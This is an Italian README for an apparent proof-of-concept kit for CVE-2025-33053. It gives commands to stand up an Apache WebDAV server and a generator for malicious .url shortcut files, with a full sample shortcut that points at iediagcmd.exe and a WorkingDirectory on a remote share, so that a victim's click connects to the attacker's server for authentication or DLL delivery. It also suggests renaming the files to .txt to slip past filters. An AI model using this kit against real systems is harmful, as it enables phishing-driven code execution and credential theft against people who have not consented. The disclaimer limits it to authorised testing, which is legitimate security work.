
CVE-2025-33053 Prova di Concetto (PoC)
Questo repository fornisce script per distribuire automaticamente un server WebDAV su Ubuntu usando Apache2 e generare file .url dannosi per l'uso in phishing, red teaming o simulazione di movimento laterale.
setup_webdav.sh – Script Bash per configurare Apache2 + WebDAV.setup_webdav.py – Versione Python del precedente.gen_url.py – Script Python per generare file .url con percorsi UNC/WebDAV.README.md – Documentazione.sudo)sudo bash setup_webdav.sh
Oppure usando Python:
sudo python3 setup_webdav.py
Per impostazione predefinita, lo script:
/var/www/webdav.DAV e DAV_FS.DavLockDB (per evitare errori di blocco DAV di Apache).📎 Percorso WebDAV:
http://<tuo-ip>/webdav/
.url dannosopython3 gen_url.py --ip 192.168.1.100 --out doc.url
python3 gen_url.py \
--ip 《YOUR IP ADDRESS》\
--share 《YOUR SHARE NAME》(Default: webdav) \
--out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
--exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
--icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
--index 13 \
--modified 20F06BA06D07BD014D
Questo creerà un file .url come:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
📌 Facendo clic su questo file (in determinate configurazioni) potrebbe indurre il sistema di destinazione a connettersi automaticamente al tuo server WebDAV (autenticazione o distribuzione di DLL).
sudo ufw allow 80
.url potrebbero non essere eseguiti come previsto a seconda di:
.url in .txt per aggirare i filtri.Questo repository è esclusivamente per test di penetrazione didattici e autorizzati.
Non utilizzare questi script contro sistemi di cui non sei proprietario o per i quali non hai il permesso di test.
Per domande o richieste di red teaming etico, contatta tramite le issue di GitHub.